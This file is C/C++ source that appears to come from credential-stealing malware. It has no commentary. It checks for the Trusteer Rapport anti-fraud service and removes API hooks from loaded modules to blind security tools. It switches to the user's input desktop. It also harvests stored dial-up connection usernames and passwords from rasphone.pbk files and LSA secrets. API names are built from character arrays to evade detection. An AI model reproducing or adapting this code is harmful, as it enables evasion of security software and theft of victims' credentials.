BOOL IsRunAntiRapport()
{
HANDLE hSnap;
BOOL ret = FALSE;
PROCESSENTRY32 proc32 ;
m_memset(&proc32,0,sizeof(PROCESSENTRY32));
hSnap = (HANDLE)pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (hSnap == INVALID_HANDLE_VALUE)
return FALSE;
proc32.dwSize = sizeof(proc32);
if ( pProcess32First(hSnap,&proc32))
{
do{
proc32.dwSize = sizeof(proc32);
if (! plstrcmpA(proc32.szExeFile,"RapportMgmtService.exe"))
{
ret = TRUE;
break;
};
}while(pProcess32Next(hSnap,&proc32));
};
pCloseHandle(hSnap);
return ret;
};
DWORD GetProcessID(LPCTSTR lpProcessName)
{
typedef HANDLE (WINAPI *CreateToolhelp32SnapshotT)
(
DWORD dwFlags,
DWORD th32ProcessID
);
CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot = (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateToolhelp32Snapshot");
typedef BOOL (WINAPI *Process32FirstT)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
Process32FirstT pProcess32First = (Process32FirstT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Process32First");
typedef BOOL (WINAPI *Process32NextT)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
Process32NextT pProcess32Next = (Process32NextT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Process32Next");
typedef int
(WINAPI
*lstrcmpAT)(
__in LPCSTR lpString1,
__in LPCSTR lpString2
);
lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrcmpA");
DWORD RetProcessID = 0;
HANDLE handle=pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32* info=new PROCESSENTRY32;
info->dwSize=sizeof(PROCESSENTRY32);
if(pProcess32First(handle,info))
{
if (strcmpi(info->szExeFile,lpProcessName) == 0)
{
RetProcessID = info->th32ProcessID;
return RetProcessID;
}
while(pProcess32Next(handle,info) != FALSE)
{
if (plstrcmpA(info->szExeFile,lpProcessName) == 0)
{
RetProcessID = info->th32ProcessID;
return RetProcessID;
}
}
}
return RetProcessID;
}
PIMAGE_SECTION_HEADER SearchSection(PIMAGE_NT_HEADERS pHeaders,LPCSTR lpName)
{
PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pHeaders);
for (WORD i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)
{
if (!plstrcmpA(lpName,(PCHAR)&pSection->Name)) return pSection;
pSection++;
}
return 0;
};
DWORD WINAPI m_lstrcmp( const char *szStr1, const char *szStr2 )
{
return (DWORD)plstrcmpA(szStr1, szStr2);
}
bool SwitchInputDesktop()
{
typedef DWORD
(WINAPI
*GetCurrentThreadIdT)(
VOID
);
GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId");
typedef HDESK
(WINAPI
*GetThreadDesktopT)(
__in DWORD dwThreadId);
GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop");
typedef BOOL
(WINAPI
*GetUserObjectInformationAT)(
__in HANDLE hObj,
__in int nIndex,
__out_bcount_opt(nLength) PVOID pvInfo,
__in DWORD nLength,
__out_opt LPDWORD lpnLengthNeeded);
GetUserObjectInformationAT pGetUserObjectInformationA=(GetUserObjectInformationAT)GetProcAddress(LoadLibrary("USER32.dll"),"GetUserObjectInformationA");
typedef BOOL
(WINAPI
*SetThreadDesktopT)(
__in HDESK hDesktop);
SetThreadDesktopT pSetThreadDesktop=(SetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"SetThreadDesktop");
typedef HDESK
(WINAPI
*OpenInputDesktopT)(
__in DWORD dwFlags,
__in BOOL fInherit,
__in ACCESS_MASK dwDesiredAccess);
OpenInputDesktopT pOpenInputDesktop=(OpenInputDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"OpenInputDesktop");
typedef BOOL
(WINAPI
*CloseDesktopT)(
__in HDESK hDesktop);
CloseDesktopT pCloseDesktop=(CloseDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"CloseDesktop");
typedef int
(WINAPI
*lstrcmpAT)(
__in LPCSTR lpString1,
__in LPCSTR lpString2
);
lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrcmpA");
BOOL bRet = false;
DWORD dwLengthNeeded;
HDESK hOldDesktop, hNewDesktop;
char strCurrentDesktop[256], strInputDesktop[256];
hOldDesktop = pGetThreadDesktop(pGetCurrentThreadId());
memset(strCurrentDesktop, 0, sizeof(strCurrentDesktop));
pGetUserObjectInformationA(hOldDesktop, UOI_NAME, &strCurrentDesktop, sizeof(strCurrentDesktop), &dwLengthNeeded);
hNewDesktop = pOpenInputDesktop(0, FALSE, MAXIMUM_ALLOWED);
memset(strInputDesktop, 0, sizeof(strInputDesktop));
pGetUserObjectInformationA(hNewDesktop, UOI_NAME, &strInputDesktop, sizeof(strInputDesktop), &dwLengthNeeded);
if (plstrcmpA(strInputDesktop, strCurrentDesktop) != 0)
{
pSetThreadDesktop(hNewDesktop);
bRet = true;
}
pCloseDesktop(hOldDesktop);
pCloseDesktop(hNewDesktop);
return bRet;
}
VOID UnhookModuleExports(HMODULE hModule)
{
CHAR szModuleFileName[MAX_PATH];
pGetModuleFileNameA(hModule,szModuleFileName,sizeof(szModuleFileName));
PVOID pMap = MapBinary(szModuleFileName);
if (pMap)
{
PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)pRtlImageNtHeader(hModule);
if (pNtHeaders)
{
DWORD dwExportsSize;
//PIMAGE_NT_HEADERS pnt = (PIMAGE_NT_HEADERS)(PIMAGE_DOS_HEADER(hModule)->e_lfanew +(PCHAR)hModule);
// dwExportsSize = pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
/*PIMAGE_EXPORT_DIRECTORY(PCHAR(hModule) + pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);//*/
PIMAGE_EXPORT_DIRECTORY ExportDirectory =(PIMAGE_EXPORT_DIRECTORY)pRtlImageDirectoryEntryToData((PVOID)hModule,TRUE,IMAGE_DIRECTORY_ENTRY_EXPORT,&dwExportsSize);
if (ExportDirectory && dwExportsSize)
{
PUSHORT Ords = (PUSHORT)((DWORD)hModule+ExportDirectory->AddressOfNameOrdinals);
PULONG EntriesRva = (PULONG)((DWORD)hModule+ExportDirectory->AddressOfFunctions);
PULONG Names = (PULONG)((DWORD)hModule+ExportDirectory->AddressOfNames);
for (ULONG cEntry = 0; cEntry < ExportDirectory->NumberOfNames; cEntry++)
{
ULONG StartSize = 10;
PVOID ApiStart = (PVOID)((DWORD)hModule+EntriesRva[Ords[cEntry]]);
PVOID ApiOriginalStart = (PVOID)((DWORD)pMap+EntriesRva[Ords[cEntry]]);
if (m_memcmp(ApiStart,ApiOriginalStart,StartSize))
{
BOOL bRestore = TRUE;
// DbgPrint("Hook found %s - %08x - %s ...",szModuleFileName,ApiStart,((DWORD_PTR)hModule+Names[cEntry]));
if (!plstrcmpA((PCHAR)((DWORD_PTR)hModule+Names[cEntry]),"InternetGetCookieExA"))
{
bRestore = FALSE;
}
if (*(BYTE*)ApiStart == 0xE9)
{
PVOID Handler = (PVOID)(*(DWORD*)((DWORD)ApiStart + 1) + (DWORD)ApiStart + 5);
CHAR FileName[MAX_PATH];
if (pGetMappedFileNameA(pGetCurrentProcess(),Handler,FileName,RTL_NUMBER_OF(FileName)-1))
{
if (!plstrcmpA(pPathFindFileNameA(FileName),"ieframe.dll"))
{
// DbgPrint("Not restored.\n");
bRestore = FALSE;
}
}
}
if (bRestore)
{
ULONG Written;
if (pWriteProcessMemory(pGetCurrentProcess(),ApiStart,ApiOriginalStart,StartSize,&Written))
{
// DbgPrint("Restored.\n");
}
else
{
// DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError());
}
}
}
}
}
}
UnmapViewOfFile(pMap);
}
}
bool CDialupass::GetRasEntries()
{
int nCount = 0;
char *lpPhoneBook[2];
char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1];
GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA");
pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1));
char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'};
lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22);
plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\");
char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
plstrcatA(szPhoneBook1, m_lpCurrentUser);
plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'};
SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39);
pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0);
char DQeBW01[] = {'%','s','\\','%','s','\0'};
char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
lpPhoneBook[0] = szPhoneBook1;
lpPhoneBook[1] = szPhoneBook2;
OSVERSIONINFO osi;
osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
char FBwWp05[] = {'G','e','t','V','e','r','s','i','o','n','E','x','A','\0'};
GetVersionExAT pGetVersionExA=(GetVersionExAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp05);
pGetVersionExA(&osi);
if(osi.dwPlatformId == VER_PLATFORM_WIN32_NT && osi.dwMajorVersion >= 5)
{
GetLsaPasswords();
}
DWORD nSize = 1024 * 4;
char *lpszReturnBuffer = new char[nSize];
char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++)
{
memset(lpszReturnBuffer, 0, nSize);
GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA");
pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]);
for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1)
{
char *lpRealSection = (char *)UTF8ToGB2312(lpSection);
char strDialParamsUID[256];
char strUserName[256];
char strPassWord[256];
char strPhoneNumber[256];
char strDevice[256];
memset(strDialParamsUID, 0, sizeof(strDialParamsUID));
memset(strUserName, 0, sizeof(strUserName));
memset(strPassWord, 0, sizeof(strPassWord));
memset(strPhoneNumber, 0, sizeof(strPhoneNumber));
memset(strDevice, 0, sizeof(strDevice));
char FBwWp04[] = {'G','e','t','P','r','i','v','a','t','e','P','r','o','f','i','l','e','S','t','r','i','n','g','A','\0'};
GetPrivateProfileStringAT pGetPrivateProfileStringA=(GetPrivateProfileStringAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp04);
int nBufferLen = pGetPrivateProfileStringA(lpSection, "DialParamsUID", 0,
strDialParamsUID, sizeof(strDialParamsUID), lpPhoneBook[i]);
char FBwWp03[] = {'l','s','t','r','c','m','p','A','\0'};
lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp03);
if (nBufferLen > 0)//DialParamsUID=4326020 198064
{
for(int j=0; j< (int)m_nRasCount; j++)
{
if(plstrcmpA(strDialParamsUID, m_PassWords[j].UID)==0)
{
plstrcpyA(strUserName, m_PassWords[j].login);
plstrcpyA(strPassWord, m_PassWords[j].pass);
m_PassWords[j].used=true;
m_nUsed++;
break;
}
}
}
pGetPrivateProfileStringA(lpSection, "PhoneNumber", 0,
strPhoneNumber, sizeof(strDialParamsUID), lpPhoneBook[i]);
pGetPrivateProfileStringA(lpSection, "Device", 0,
strDevice, sizeof(strDialParamsUID), lpPhoneBook[i]);
char *lpRealDevice = (char *)UTF8ToGB2312(strDevice);
char *lpRealUserName = (char *)UTF8ToGB2312(strUserName);
Set(strDialParamsUID, lpRealSection, lpRealUserName, strPassWord,
strPhoneNumber, lpRealDevice);
// delete lpRealSection;
// delete lpRealUserName;
// delete lpRealDevice;
}
}
delete lpszReturnBuffer;
return true;
}